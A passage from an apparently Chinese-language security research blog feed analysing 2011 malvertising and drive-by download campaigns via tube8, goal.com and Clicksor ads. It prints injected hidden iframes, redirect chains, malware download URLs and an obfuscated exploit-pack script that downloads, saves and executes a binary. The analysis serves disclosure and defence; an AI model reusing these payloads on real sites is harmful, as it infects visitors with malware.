下圖則是本次事件中相關的網站:<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-cAQi0zkEybo/TdzcqRVZ8KI/AAAAAAAACQk/C9sF_5hfdvk/s1600/pornhub_malvertising_drive_by_download_tube8.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand; width:750px" src="http://1.bp.blogspot.com/-cAQi0zkEybo/TdzcqRVZ8KI/AAAAAAAACQk/C9sF_5hfdvk/s1600/pornhub_malvertising_drive_by_download_tube8.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5610601854562594978" /></a><br />
整個感染鏈及細節如下:<br />
<br />
1. http://tube8.com<br />
<br />
2. http://delivery.trafficjunky.net/deliver2.php?zone_id=42&site_id=13&cache=1305558225&c=HomePage<br />
<br />
3. http://media.trafficjunky.net/cdn_custom_ads/pornhublive/T8ftphl.html<br />
<pre class="brush: html; auto-links: false"><iframe src="http://ifa.camads.net/dif/?cid=tube8-footer-950x300" allowtransparency=true width=950 height=300 frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
</pre><br />
<br />
4. http://ifa.camads.net/dif/?cid=tube8-footer-950x300<br />
<br />
5. http://pages.etology.com/imp2/96244.php<br />
<br />
6. http://celeb-escorts.com/banners/300x250.jpg<br />
<br />
7. http://tun4atta.in/bcounter.php?u=adult<br />
<pre class="brush: html; auto-links: false"><iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?adult'></iframe>
</pre><br />
8. http://iban6duo.in/ts/in.cgi?adult<br />
<pre class="brush: html; auto-links: false"><html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb'">
</head>
<body>
document moved <a href="http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb">here</a>
</body>
</html>
</pre><br />
9. http://finish.horseretirementhome.com/index.php?tp=452874001a8808fb<br />
(此即為最後下載並執行的惡意軟體)<br />
<br />
根據這兩個網站龐大的流量(分別為<a href="http://siteanalytics.compete.com/pornhub.com/">23,873,546</a> 和 <a href="http://siteanalytics.compete.com/tube8.com/">10,885,350</a>),而且從五月13日開我們就一直發現這個惡意廣告的存在,相信截至目前為止,已經有相當大的劉覽者被感染了。</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-823872745847871326?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=I80o48LBjvU:4ViWt4rp5QA:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=I80o48LBjvU:4ViWt4rp5QA:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=I80o48LBjvU:4ViWt4rp5QA:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=I80o48LBjvU:4ViWt4rp5QA:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/I80o48LBjvU" height="1" width="1"/>Colanoreply@blogger.com1http://armorize-cht.blogspot.com/2011/05/blog-post.htmltag:blogger.com,1999:blog-1441759431140700676.post-48446937282283603942011-05-20T20:17:00.000+08:002011-05-20T20:17:41.425+08:002011-05-20T20:17:41.425+08:00goal.com再度散播惡意程式:偽防毒軟體"Security Shield"(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-1tSvUylJJwg/TdMxdKbLTfI/AAAAAAAACPc/894VMP4lGHM/s1600/goal_com_web_malware_fake_av_security_shield.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/-1tSvUylJJwg/TdMxdKbLTfI/AAAAAAAACPc/894VMP4lGHM/s1600/goal_com_web_malware_fake_av_security_shield.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5607880338090708466" /></a><br />
在我們<a href="http://blog.armorize.com/2011/05/goalcom-serving-malware.html">上一篇分析goal.com</a>的報導中,有提到一段:"根據我們所搜集到的資料,有部份的goal.com似乎已經被感染且允許攻擊者操控其網頁內容。受感染網站可能存在供攻擊者持續使用的後門程式,用以控制該網站。"<br />
<br />
上次事件中所使用的惡意程式碼在不久之後即從goal.com中消失,然而,<a href="http://hackalert.armorize.com/">HackAlert</a>在最近(2011/5/17)又偵測到該網站有在散播惡意軟體的行為,表示攻擊者在該網站應該已經植入了後門。在這一次,他們透過goal.com來散播偽防毒軟體"Security Shield"。<br />
<br />
<b>[摘要]</b><br />
<br />
觸發行為:<br />
在使用者瀏覽Goal.com後,瀏覽器執行了該網站中被插入的惡意程式碼(指向31d6f5art8.co.be)後,不需要透過任何誘騙的手段、也不需要使用者點選特定連結,便會開始產生偷渡式下載(Drive-by Download)的行為將偽防毒軟體"Security Shield"安裝到使用者的電腦上。使用者僅是簡單的瀏覽一個網站,就受到惡意程式的感染。"Security Shield"會持續的發出警告,同時開啟瀏覽器連到一些成人網站,只有在當使用者購買了"序號"之後,才會停止這些擾人的行為。就算將電腦重開機,也沒有辦法停止這些擾人的行為,因為該偽防毒軟體已經安裝到使用者的電腦裡面並且常駐著。<br />
<br />
惡意網域 a78hl7zv4p.co.be 針對每一個IP僅會提供一次攻擊碼。<br />
<br />
在這篇文章剛發出之後,攻擊者又非常快速的將上面提到的兩個惡意網域關閉,立刻使用了一組新的惡意網域:zfdim0u06t.co.be 以及 4t7uxaxrg8.co.be。而當我們在修改我們部落格上的文章時,他們又換了一組惡意網域:uzldzzzeo3.co.be 及 zepa6hr6jk.co.be。<br />
<br />
偵測率:<br />
惡意網域包含 31d6f5art8.co.be、a78hl7zv4p.co.be、zfdim0u06t.co.be 及 4t7uxaxrg8.co.be。沒有任何一個被urlvoid.com上面的18家黑名單提供者標示為黑名單。<br />
至於goal.com本身,在<a href="http://www.urlvoid.com/scan/goal.com">urlvoid.com</a>上同樣也沒有被任何一家標示(0/18)。<br />
<br />
惡意程式"Security Shield"本身在<a href="http://www.virustotal.com/file-scan/report.html?id=089329aa3c9a379d90629f9edb796c6aad161a908cf377b79b0e72f02a0e62be-1305629011">VirusTotal</a>上面的偵測率是6/42。<br />
<br />
使用技術:<br />
偷渡式下載(Drive-by Download),攻擊者控制了goal.com的內容。(本案例非透過惡意廣告散播)<br />
<br />
以下是我們針對這一事件所錄製的影片,從一開始瀏覽goal.com,到整個"Security Shield"執行起來。<br />
<object width="750"><param name="movie" value="http://www.youtube.com/v/Jw9ekH0XvvE?hl=zh&fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/Jw9ekH0XvvE?hl=zh&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object><br />
<b>[感染點]</b><br />
被感染的網址是[http://www.goal.com/en],以下為感染進去的程式碼片段:<br />
<pre class="brush: html;"><div id="eplayer">
<style type="text/css">#adtfd {width: 1px;height: 1px;frameborder: no;visibility: hidden;}</style>
<iframe id="adtfd" src="http://31d6f5art8.co.be/ad.jpg"></iframe>
</div>
</pre><br />
此段程式碼會產生iframe指向 http://a78hl7zv4p.co.be/domains/buy,這就是產生攻擊碼(exploit code)的網址。<br />
攻擊碼一旦成功執行,瀏覽器會產生偷渡式下載的行為:從 http://a78hl7zv4p.co.be/domains/bf02bde9910ff9be016eb48ac5a51043.php?thread_id=2&f=63444537&topic_id=buy& 下載"Security Shield"。<br />
<br />
"Security Shield"會自行進行安裝,隨即開始顯示假的警告以及自動開始瀏覽器連向成人網站:<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/-ASDKuzQFdt0/TdNWDWDCc3I/AAAAAAAACPk/_WvsttpuGVk/s1600/goal_com_web_malware_fake_av_security_shield_installed.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/-ASDKuzQFdt0/TdNWDWDCc3I/AAAAAAAACPk/_WvsttpuGVk/s1600/goal_com_web_malware_fake_av_security_shield_installed.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5607920576464319346" /></a><span class="fullpost"><br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-87mJFvctPt8/TdN1NilQgxI/AAAAAAAACP8/kEEQVqD4sGg/s1600/security_shield_infection.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width:750px" src="http://4.bp.blogspot.com/-87mJFvctPt8/TdN1NilQgxI/AAAAAAAACP8/kEEQVqD4sGg/s1600/security_shield_infection.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5607954836488225554" /></a><br />
<b>[偵測率]</b><br />
惡意程式"Security Shield"本身在<a href="http://www.virustotal.com/file-scan/report.html?id=089329aa3c9a379d90629f9edb796c6aad161a908cf377b79b0e72f02a0e62be-1305629011">VirusTotal</a>上面的偵測率是6/42。<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/-0AITEozIpCM/TdNwFOIZTXI/AAAAAAAACPs/p2BGsMq7tlE/s1600/Goal_Com_drive_by_download_detection_rate.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/-0AITEozIpCM/TdNwFOIZTXI/AAAAAAAACPs/p2BGsMq7tlE/s1600/Goal_Com_drive_by_download_detection_rate.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5607949196001365362" /></a><br />
goal.com本身,在<a href="http://www.urlvoid.com/scan/goal.com">urlvoid.com</a>上被標示為黑名單的比率是0/18。<br />
<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/-d3SqlQvqtF4/TdNzHdSVYQI/AAAAAAAACP0/9bwXDE1C-Pw/s1600/url_void_goal_com_web_malware_drive_by_download.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/-d3SqlQvqtF4/TdNzHdSVYQI/AAAAAAAACP0/9bwXDE1C-Pw/s1600/url_void_goal_com_web_malware_drive_by_download.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5607952532964204802" /></a><br />
<br />
<b>[網站流量及排名]</b><br />
1. 根據<a href="http://siteanalytics.compete.com/goal.com/">compete.com</a>,goal.com每一天平均有232,116個人瀏覽。<br />
2. 根據<a href="http://www.checksitetraffic.com/traffic_spy/goal.com">checksitetraffic.com</a>,每一天則有215,989人。<br />
3. goal.com在Alexa<a href="http://www.alexa.com/siteinfo/goal.com">alexa.com</a>全球的排名是Rank. 379。<br />
</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1441759431140700676-4844693728228360394?l=armorize-cht.blogspot.com' alt='' /></div><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=KFywFUMV8uI:b5I7f168U0c:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=yIl2AUoC8zA" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=KFywFUMV8uI:b5I7f168U0c:63t7Ie-LG7Y"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?d=63t7Ie-LG7Y" border="0"></img></a> <a href="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?a=KFywFUMV8uI:b5I7f168U0c:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/blogspot/armorize_cht?i=KFywFUMV8uI:b5I7f168U0c:V_sGLiPBpWU" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/blogspot/armorize_cht/~4/KFywFUMV8uI" height="1" width="1"/>Colanoreply@blogger.com0http://armorize-cht.blogspot.com/2011/05/goalcomsecurity-shield.htmltag:blogger.com,1999:blog-1441759431140700676.post-79273666714427804522011-05-16T13:24:00.005+08:002011-06-17T17:20:32.207+08:002011-06-17T17:20:32.207+08:00超過一半以上的惡意廣告來自Clicksor(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)<br />
<div class="separator" style="clear: both; text-align: center;"></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Y4gTW0x70Fo/TctAOR8RxZI/AAAAAAAAAC0/XwkTaLAFaVA/s1600/clicksor.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="486" src="http://3.bp.blogspot.com/-Y4gTW0x70Fo/TctAOR8RxZI/AAAAAAAAAC0/XwkTaLAFaVA/s640/clicksor.png" width="640" /></a></div><br />
最近,我們的Hackalert偵測到大量的惡意廣告(Malvertising),其中有一半以上是來自廣告商-<b>Clicksor</b>。<br />
<br />
<b>分析:</b><br />
這邊我們只挑了其中一個來做分析說明。<a href=http://www.openwaves.net/Clicksor_infection/mytingoo.com.zip><b>這邊有完整的記錄檔可供下載</b></a>,其感染路徑如下:<br />
<br />
1. 受害網站: <br />
<pre class="brush: html;">http://mytingoo.com/</pre>2. 包含的Clicksor廣告連結: <br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=164907&adtype=1&sid=252118&zone=17836"></script></pre>3. 載入廣告的內容片斷:<br />
<pre class="brush: html;"><script type="text/javascript" src="http://pub.clicksor.net/newServing/js/banner.js"></script></head><body><div id="tip"><span>Tooltips</span></div><div id="ad_block"><ul><li><ol><li class="rich" style="width:728px;height:90px;" id="ad0" ><iframe src=http://anexsecurity.com/pub_ben/728x90.jpg width='728' height='90' frameborder='0' scrolling='no' marginheight=0 marginwidth=0></iframe><img border="0" width="1" height="1" alt="roi px" src="http://serw.clicksor.com/newServing/roitrack.php?cluid=1092-1-186469-30-94296-57-1304418113354-1304418118-1034384353-281945&nid=1&type=Other&value=-1&adsid=51" /></li></ol></li></ul></div><!-- generated in 0.017482995986938s. --></body></html></pre>4. 其中<b>http://anexsecurity.com/pub_ben/728x90.jpg</b>為被插入的惡意廣告,它偽裝成一個圖形檔,事際上它是一個html,會載入一個真正的jpg檔,同時產生一個iframe來導到惡意的重導連結。其內容如下:<br />
<span class="fullpost"><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-4vPxRfj66kw/TdCocby_vjI/AAAAAAAAADI/PDdl47buE14/s1600/case02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="80" src="http://3.bp.blogspot.com/-4vPxRfj66kw/TdCocby_vjI/AAAAAAAAADI/PDdl47buE14/s640/case02.png" width="640" /></a></div><br />
<pre class="brush: html;"><a href='http://anexsecurity.com/' target='_parent'><img src='http://anexsecurity.com/banners/728x90.jpg' border=0></a><iframe src='http://yobi3sol.in/bcounter.php?u=ben' width='46' height='51' frameborder='0' scrolling='no'></iframe></pre>5. 接下來<b>http://yobi3sol.in/bcounter.php?u=ben</b>會進行兩次的重導動作,內容如下:<br />
<pre class="brush: html;"><iframe width='34' height='44' frameborder='0' scrolling='no' src='http://iban6duo.in/ts/in.cgi?ben'></iframe></pre>6. http://iban6duo.in/ts/in.cgi?ben內容如下:<br />
<pre class="brush: html;"><html><head><meta http-equiv="REFRESH" content="1; URL='http://set.obamawebsites.com/news/1992'"></head><body>document moved <a href="http://set.obamawebsites.com/news/1992">here</a></body></html></pre>7. 最後重導到惡意的exploit pack連結http://set.obamawebsites.com/news/1992(它會根據你browser的版本環境產生相對應的exploit),內容如下:<br />
<pre class="brush: html;"><html>jowls velum loo carders ut feet sixmos showily tansy.<body>ret too wyn trues field migg pot cyclers bionts wud begs vein atelic pe wops showily kea. Keet yowe swoon topic collar wo mess relief. Fil favas yarns firm robbed. Taiga velum slew shoal shiver ays at hanting dug carders yatter ed slims an.wires but kea cark dottel ink field relief od ged migg shiver sixmos tophs jowls too blond hided.bionts deaf bine inbred hanting ink harpies ben pot loop.dottel wud but yo at firm.<script>function much(week, simple, little){this.island=30769;this.island+=236;so=20385;so++;this.find=25361;this.find+=76;red=29297;red++;var other={hold:23009};var never="";useVowel={};this.dog=1417;this.dog++;for(var wonder=0; wonder < week.length; wonder++){var plant=simple.indexOf(week.charAt(wonder));simpleIf=["coursePlain","four"];noun=["river","objectUp"];mark=27117;mark++;even=["noteTheir","took","any"];this.pound="pound";if(plant > -1 ){never += little.charAt(plant);}}return never;};function windMe(){this.tell=false;this.music=22597;this.music+=144;place=["thoughBusy","an","plan"];var such = document.createElement(new String("objectdIph".substr(0,6)));var rock = String(".//..//"+"iexplor"+"e.exe");var teach=["wantPoint","rule","wood"];their=7813;their++;var earth=false;what=["haveRan","field"];;try {} catch(realKnow){};might=[];such.setAttribute("id", such);var stepDark=2303;better={force:"walk"};still=24187;still-=254;weStreet={got:"orAgain"};such.setAttribute(new String("classid"), "cls"+"id:"+"BD9nzC".substr(0,3)+"6C5"+"56-"+"65A7Y4G".substr(0,3)+"3-1"+"1D0"+"-98sESy".substr(0,3)+"3A-E9Q".substr(0,3)+"00C"+"h5K04FK5h".substr(3,3)+"C29jPF".substr(0,3)+"KzSgE36SzKg".substr(4,3));try {var you=String("CreateOMLv".substr(0,7)+"4l2kbjectlk42".substr(4,5));this.few=20943;this.few-=226;more=11149;more++;var tookState=["doName","old"];this.must="";var back = such[you]("msxml2.SQbZ".substr(0,7)+"XMLHTTPe2x".substr(0,7), "");var friend = such[you](new String("adodb.strea"+"m"), "");var up = such[you](new String("Shel1ndW".substr(0,4)+"l.Ap"+"ZWYjplicWYjZ".substr(4,4)+"atioW8C".substr(0,4)+"n9Yk".substr(0,1)), "");var had=false;try {back.open(String("GET"), much("FYYzK//SiY_9qPtP4iqSQYiS_#9tK0o/Ni4S/i=j6Pa#qVaH#qa:joj0niHoZPP0Z=jnH_zFz;YFUiPVvQVC6x=Cnja::o0xY9zQ#vQVCaZZ6x", "oa6jn:HO0ZPq#Vi=5FQBGItN9z&USY.p4kR?wWAlXfJ32d7yc1buDrgE%sM-8e/_KvL;xChTm","0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#;"), false);back.send();friend.type = 1;friend.open();friend.Write(back.responseBody);friend["Save"+"ToFi"+"le"](rock, 2);friend.Close();} catch (e) {move();}try {up["she"+"llegwzW".substr(0,3)+"xec"+"fnxKutenKxf".substr(4,3)](rock);} catch (e) {move();}} catch (e) {move();}move();}function move(){var d=document, prefix="<meta http-equiv='refresh'"; d.write(prefix + " content='0; url=?topic_id=1992&thread_id=2&f=4315508&i=i&action=6.0&t=m&c=k&x=157&start=MSIE'>");}var under=0;var also=false;function a(){while(under++ < 122){a();}if(!also){also = true;windMe();}}a();</script>sixmo hanting dug kea migg cambric scenic.cowbird inbred showily trauma at keet.</body></html></pre>8. exploit打成功後,所下載的Malware(exe file)連結<br />
<pre class="brush: html;">http://set.obamawebsites.com/news/ef32a1cbd16cb1530384e609aa89f346.php?thread_id=2&f=4315508&topic_id=1992&</pre><br />
<b>特性:</b><br />
<br />
a. 不易被偵測:<br />
b. 存活時間長: 超過三個月以上<br />
c. 影響範圍廣: 同時超過20000個網站立即受影響<br />
<br />
<br />
由於廣告本身會以區域性來載入不一樣的廣告,每個地區所看到的廣告也都可能不一樣,而且是以輪動的方式輪流載入每則廣告,因此並不會每一次都會載入到惡意那一則廣告。由於這個特性也讓偵測上變得較為不容易。<br />
<br />
這邊我們隨機列出了20個被Hackalert偵測到含有惡意Clicksor廣告的網站列表,其中包括受影響的網站網址、所含<br />
的Clicksor廣告連結、所下載的惡意軟體連結以及Google safe-browsing的測偵報告。<br />
<br />
1. http://fulldowns.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://fulldowns.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=101949&adtype=2&sid=179908&zone=17914"></script></pre><pre class="brush: html;">http://payments.cavatars.mobi/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=55210399&forum_id=1991&</pre>2. http://benefitslifeinsurance.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://benefitslifeinsurance.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=173387&adtype=1&sid=276044&zone=24445"></script></pre><pre class="brush: html;">http://new.shelfstyles.com/news/8f9ed1204515e67963d9cacaf29c1721.php?start=2&thread_id=55436582&forum_id=1991&</pre>3. http://yoursbuzz.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://yoursbuzz.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=54913&adtype=8&sid=126026"></script></pre><pre class="brush: html;">http://name.srikantanraghavan.com/news/c73790e424f82f37dafca43d22bcd969.php?start=2&thread_id=55877751&forum_id=1991&</pre>4. http://download3gpvideo.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://download3gpvideo.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=96186&adtype=1&sid=141705"></script></pre><pre class="brush: html;">http://grand.atlantahomevaluesnow.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=56082781&forum_id=1992&</pre>5. http://toreal.blogs.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://toreal.blogs.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=178920&adtype=2&sid=279105&zone=25280"></script></pre><pre class="brush: html;">http://articles.ez2avoidforeclosures.info/news/91470a9da1e0ca5417d64d9b516fe0b9.php?start=2&thread_id=56415659&forum_id=1991&</pre>6. http://disgracefulandsexy.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://disgracefulandsexy.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?pid=41866&adtype=1&sid=109599&zone=1625"></script></pre><pre class="brush: html;">http://journals.davedavisquarterhorses.com/news/91470a9da1e0ca5417d64d9b516fe0b9.php?start=2&thread_id=56529138&forum_id=1992&</pre>7. http://paraparapu.info/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://paraparapu.info/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=93575&adtype=1&sid=186469"></script></pre><pre class="brush: html;">http://trip.completehorsefeed.com/news/23fb2f31ed03d9f164c871906669e048.php?start=2&thread_id=56702901&forum_id=1992&</pre>8. http://eatmanga.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://eatmanga.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=131447&adtype=1&sid=196587&zone=8781"></script></pre><pre class="brush: html;">http://tracks.fresnobabies.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=2336475&forum_id=1992&</pre>9. http://bored-space.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://bored-space.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=89473&adtype=5&sid=131655"></script></pre><pre class="brush: html;">http://dao.ez2avoidforeclosures.net/news/23fb2f31ed03d9f164c871906669e048.php?start=2&thread_id=57645591&forum_id=1991&</pre>10. http://animekyun.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://animekyun.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=59792&adtype=5&sid=274074&zone=23946"></script></pre><pre class="brush: html;">http://cash.ez2avoidforeclosures.org/news/8f9ed1204515e67963d9cacaf29c1721.php?start=2&thread_id=57957716&forum_id=1991&</pre>11. http://freemediatv.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://freemediatv.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=154793&adtype=1&sid=233437"></script></pre><pre class="brush: html;">http://cash.ez2avoidforeclosures.org/news/23fb2f31ed03d9f164c871906669e048.php?start=2&thread_id=57999481&forum_id=1991&</pre>12. http://sexgamefun.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://sexgamefun.com/">Google SafeBrowsing</a> <br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?pid=64605&adtype=&sid=89809&zone="></script></pre><pre class="brush: html;">http://vvvvvv.dyndns-mail.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=3271149&forum_id=1997&</pre>13. http://ourglocal.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://ourglocal.com/">Google SafeBrowsing</a> <br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=121355&adtype=1&sid=182046"></script></pre><pre class="brush: html;">http://tracks.fresnobabies.com/news/aeea8469e09d31020332ac926f183eaa.php?start=2&thread_id=3336736&forum_id=1992&</pre>14. http://amfmph.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://amfmph.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=98092&adtype=1&sid=160896"></script></pre><pre class="brush: html;">http://service.obamawebsites.com/news/c73790e424f82f37dafca43d22bcd969.php?start=2&thread_id=3761681&forum_id=1992&</pre>15. http://newhmusic.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://newhmusic.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=169111&adtype=5&sid=259771&zone=19713"></script></pre><pre class="brush: html;">http://set.obamawebsites.com/news/8f9ed1204515e67963d9cacaf29c1721.php?thread_id=2&f=4271699&topic_id=1992&</pre>16. http://mytingoo.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://mytingoo.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=164907&adtype=1&sid=252118&zone=17836"></script></pre><pre class="brush: html;">http://set.obamawebsites.com/news/c73790e424f82f37dafca43d22bcd969.php?thread_id=2&f=4301478&topic_id=1992&</pre>17. http://op3l.us/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://op3l.us/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=148633&adtype=1&sid=222364&float=1"></script></pre><pre class="brush: html;">http://s0s.shafranconstruction.com/news/91470a9da1e0ca5417d64d9b516fe0b9.php?thread_id=2&f=4736600&topic_id=1992&</pre>18. http://chandan.org/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://chandan.org/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=107976&adtype=5&sid=161671"></script></pre><pre class="brush: html;">http://set.gambulingwebsites.com/news/23fb2f31ed03d9f164c871906669e048.php?thread_id=2&f=4765006&topic_id=1994&</pre>19. http://thedirectdownload.blogspot.com/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://thedirectdownload.blogspot.com/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script src="http://ads.clicksor.com/showAd.php?pid=107464&adtype=5&sid=160535&zone=" type="text/javascript"></script></pre><pre class="brush: html;">http://set.gambulingwebsites.com/news/aeea8469e09d31020332ac926f183eaa.php?thread_id=2&f=5090485&topic_id=1994&</pre>20. http://upload3r.net/ <a href="http://www.google.com/safebrowsing/diagnostic?site=http://upload3r.net/">Google SafeBrowsing</a><br />
<pre class="brush: html;"><script type="text/javascript" src="http://ads.clicksor.com/showAd.php?nid=1&pid=166255&adtype=2&sid=254502&zone=18385"></script></pre><pre class="brush: html;">http://forum.moonrocksporthorses.com/news/91470a9da1e0ca5417d64d9b516fe0b9.php?thread_id=2&f=5196921&topic_id=1994&</pre><br />
在這20個網站中只有2個網站(約10%)被Google safe-browsing偵測到為惡意,其它皆未列入可疑網站,可見在偵測上有其難度。<br />
<br />
事實上,我們的Hackalert在今年1/25就偵測到類似的案例,應該也是同一個人所為,只不過他當時用的是另一則廣告圖,但是手法幾乎一模一樣,一般來說這些惡意的連結頂多存活個1~2個星期就很了不起了。而這個案例的是從1/25算起,已經<b>超過三個月了</b>,到現在它依然還在運作,<br />
<br />
以下為當時的感染路徑:<br />
<br />
1. http://ultimate-board.com/ (受影響的網站)<br />
<br />
2. http://ads.clicksor.com/showAd.php?nid=1&pid=161822&adtype=2&sid=246482 (不一定能再載入到下列這則惡意廣告)<br />
<br />
3. http://personnelagency.org/pub_ben/728x90.jpg (這是一個偽裝的圖檔,事實上是一個html,內容如下)<br />
<br />
